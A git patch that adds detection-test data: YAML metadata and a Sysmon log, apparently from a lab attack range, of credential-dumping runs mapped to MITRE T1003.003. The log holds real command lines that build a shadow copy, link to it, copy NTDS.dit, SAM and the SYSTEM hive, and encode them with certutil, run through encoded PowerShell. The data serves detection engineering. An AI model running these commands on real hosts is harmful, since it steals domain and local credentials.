From 2ca7135b0db3dfd8cd9ab7331f3179e6e25f3024 Mon Sep 17 00:00:00 2001 From: P4T12ICK Date: Mon, 3 Nov 2025 16:53:00 +0100 Subject: [PATCH 1/2] Add YAML metadata for T1003.003 --- .../credential-dumping-via-symlink.yml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 datasets/attack_techniques/T1003.003/credential-dumping-via-symlink/credential-dumping-via-symlink.yml diff --git a/datasets/attack_techniques/T1003.003/credential-dumping-via-symlink/credential-dumping-via-symlink.yml b/datasets/attack_techniques/T1003.003/credential-dumping-via-symlink/credential-dumping-via-symlink.yml new file mode 100644 index 00000000..d1221ab6 --- /dev/null +++ b/datasets/attack_techniques/T1003.003/credential-dumping-via-symlink/credential-dumping-via-symlink.yml @@ -0,0 +1,14 @@ +author: PB +id: 6143fa9b-ee6b-43e2-8bfb-b3240cc6e84b +date: '2025-11-03' +description: Attack data for detection Credential Dumping via Symlink to Shadow Copy + New +environment: attack_range +directory: credential-dumping-via-symlink +mitre_technique: +- T1003.003 +datasets: +- name: data + path: datasets/attack_techniques/T1003.003/credential-dumping-via-symlink/data.log + sourcetype: XmlWinEventLog + source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational From 06a8cded568d118755c68bc8808afbd1a6b09e59 Mon Sep 17 00:00:00 2001 From: P4T12ICK Date: Mon, 3 Nov 2025 16:53:02 +0100 Subject: [PATCH 2/2] Add attack data for T1003.003 --- .../credential-dumping-via-symlink/data.log | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 datasets/attack_techniques/T1003.003/credential-dumping-via-symlink/data.log diff --git a/datasets/attack_techniques/T1003.003/credential-dumping-via-symlink/data.log b/datasets/attack_techniques/T1003.003/credential-dumping-via-symlink/data.log new file mode 100644 index 00000000..c6210d69 --- /dev/null +++ b/datasets/attack_techniques/T1003.003/credential-dumping-via-symlink/data.log @@ -0,0 +1,19 @@ +154100x80000000000000001814Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:52:42.957{506a9d8f-7b6a-6908-6f07-000000007003}3100C:\Windows\System32\cmd.exe10.0.17763.1697 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c vssadmin.exe create shadow /for=C: & mklink /D C:\Temp\vssstore \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-7b61-6908-0dc1-5b0000000000}0x5bc10d0HighMD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18{506a9d8f-7b63-6908-4a07-000000007003}1068C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMACgBJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAzACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA==AR-WIN-1\Administrator +154100x80000000000000001795Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:52:38.141{506a9d8f-7b66-6908-5607-000000007003}1984C:\Windows\System32\cmd.exe10.0.17763.1697 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\Temp\VSC_SYSTEM_HIVE & reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM_HIVEC:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-7b61-6908-0dc1-5b0000000000}0x5bc10d0HighMD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18{506a9d8f-7b63-6908-4a07-000000007003}1068C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMACgBJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAzACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA==AR-WIN-1\Administrator +154100x80000000000000001748Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:52:32.108{506a9d8f-7b60-6908-2a07-000000007003}4228C:\Windows\System32\cmd.exe10.0.17763.1697 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c if not exist \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 (exit /b 1) C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-7b5c-6908-9d11-5b0000000000}0x5b119d0HighMD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18{506a9d8f-7b5d-6908-0e07-000000007003}1656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAzACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMAAR-WIN-1\Administrator +154100x80000000000000001746Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:52:32.064{506a9d8f-7b60-6908-2707-000000007003}4180C:\Windows\System32\cmd.exe10.0.17763.1697 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c if not exist \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 (exit /b 1) C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-7b5c-6908-9d11-5b0000000000}0x5b119d0HighMD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18{506a9d8f-7b5d-6908-0e07-000000007003}1656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAzACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMAAR-WIN-1\Administrator +154100x80000000000000001627Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:45.194{506a9d8f-798d-6908-c306-000000007003}3340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17763.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {1..10 | %% { + try { [System.IO.File]::Copy(\""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\SAM\"" , \""$env:TEMP\SAMvss$_\"", \""true\"") } catch {} + ls \""$env:TEMP\SAMvss$_\"" -ErrorAction Ignore +}}C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F{506a9d8f-7980-6908-9306-000000007003}3528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMACgBJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA==AR-WIN-1\Administrator +154100x80000000000000001626Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:45.004{506a9d8f-798d-6908-c206-000000007003}4848C:\Windows\System32\certutil.exe10.0.17763.5696 (WinBuild.160101.0800)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss10 2 C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=E53CE0751C3D4C884A5FFF753462EFFA,SHA256=98D63F0F44C8AFAF1A4B11E38E92F81ADD7F59FD1FF7B296FC3D40C7F0094177,IMPHASH=683B8A445B00A271FC57848D893BD6C4{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe"cmd.exe" /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*AR-WIN-1\Administrator +154100x80000000000000001625Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:44.967{506a9d8f-798c-6908-c106-000000007003}4812C:\Windows\System32\certutil.exe10.0.17763.5696 (WinBuild.160101.0800)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy9\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss9 2 C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=E53CE0751C3D4C884A5FFF753462EFFA,SHA256=98D63F0F44C8AFAF1A4B11E38E92F81ADD7F59FD1FF7B296FC3D40C7F0094177,IMPHASH=683B8A445B00A271FC57848D893BD6C4{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe"cmd.exe" /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*AR-WIN-1\Administrator +154100x80000000000000001624Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:44.916{506a9d8f-798c-6908-c006-000000007003}3132C:\Windows\System32\certutil.exe10.0.17763.5696 (WinBuild.160101.0800)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss8 2 C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=E53CE0751C3D4C884A5FFF753462EFFA,SHA256=98D63F0F44C8AFAF1A4B11E38E92F81ADD7F59FD1FF7B296FC3D40C7F0094177,IMPHASH=683B8A445B00A271FC57848D893BD6C4{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe"cmd.exe" /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*AR-WIN-1\Administrator +154100x80000000000000001623Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:44.864{506a9d8f-798c-6908-bf06-000000007003}1588C:\Windows\System32\certutil.exe10.0.17763.5696 (WinBuild.160101.0800)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss7 2 C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=E53CE0751C3D4C884A5FFF753462EFFA,SHA256=98D63F0F44C8AFAF1A4B11E38E92F81ADD7F59FD1FF7B296FC3D40C7F0094177,IMPHASH=683B8A445B00A271FC57848D893BD6C4{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe"cmd.exe" /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*AR-WIN-1\Administrator +154100x80000000000000001622Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:44.820{506a9d8f-798c-6908-be06-000000007003}3584C:\Windows\System32\certutil.exe10.0.17763.5696 (WinBuild.160101.0800)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy6\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss6 2 C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=E53CE0751C3D4C884A5FFF753462EFFA,SHA256=98D63F0F44C8AFAF1A4B11E38E92F81ADD7F59FD1FF7B296FC3D40C7F0094177,IMPHASH=683B8A445B00A271FC57848D893BD6C4{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe"cmd.exe" /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*AR-WIN-1\Administrator +154100x80000000000000001621Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:44.776{506a9d8f-798c-6908-bd06-000000007003}484C:\Windows\System32\certutil.exe10.0.17763.5696 (WinBuild.160101.0800)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss5 2 C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=E53CE0751C3D4C884A5FFF753462EFFA,SHA256=98D63F0F44C8AFAF1A4B11E38E92F81ADD7F59FD1FF7B296FC3D40C7F0094177,IMPHASH=683B8A445B00A271FC57848D893BD6C4{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe"cmd.exe" /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*AR-WIN-1\Administrator +154100x80000000000000001620Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:44.697{506a9d8f-798c-6908-bc06-000000007003}3832C:\Windows\System32\certutil.exe10.0.17763.5696 (WinBuild.160101.0800)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss4 2 C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=E53CE0751C3D4C884A5FFF753462EFFA,SHA256=98D63F0F44C8AFAF1A4B11E38E92F81ADD7F59FD1FF7B296FC3D40C7F0094177,IMPHASH=683B8A445B00A271FC57848D893BD6C4{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe"cmd.exe" /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*AR-WIN-1\Administrator +154100x80000000000000001619Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:44.658{506a9d8f-798c-6908-bb06-000000007003}3580C:\Windows\System32\certutil.exe10.0.17763.5696 (WinBuild.160101.0800)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss3 2 C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=E53CE0751C3D4C884A5FFF753462EFFA,SHA256=98D63F0F44C8AFAF1A4B11E38E92F81ADD7F59FD1FF7B296FC3D40C7F0094177,IMPHASH=683B8A445B00A271FC57848D893BD6C4{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe"cmd.exe" /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*AR-WIN-1\Administrator +154100x80000000000000001618Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:44.622{506a9d8f-798c-6908-ba06-000000007003}5016C:\Windows\System32\certutil.exe10.0.17763.5696 (WinBuild.160101.0800)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss2 2 C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=E53CE0751C3D4C884A5FFF753462EFFA,SHA256=98D63F0F44C8AFAF1A4B11E38E92F81ADD7F59FD1FF7B296FC3D40C7F0094177,IMPHASH=683B8A445B00A271FC57848D893BD6C4{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe"cmd.exe" /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*AR-WIN-1\Administrator +154100x80000000000000001617Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:44.495{506a9d8f-798c-6908-b906-000000007003}2744C:\Windows\System32\certutil.exe10.0.17763.5696 (WinBuild.160101.0800)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss1 2 C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=E53CE0751C3D4C884A5FFF753462EFFA,SHA256=98D63F0F44C8AFAF1A4B11E38E92F81ADD7F59FD1FF7B296FC3D40C7F0094177,IMPHASH=683B8A445B00A271FC57848D893BD6C4{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe"cmd.exe" /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*AR-WIN-1\Administrator +154100x80000000000000001616Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:44.425{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe10.0.17763.1697 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c for /L %%a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%%a\Windows\System32\config\SAM" %%temp%%\SAMvss%%a 2 >nul 2>&1) & dir /B %%temp%%\SAMvss*C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18{506a9d8f-7980-6908-9306-000000007003}3528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMACgBJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA==AR-WIN-1\Administrator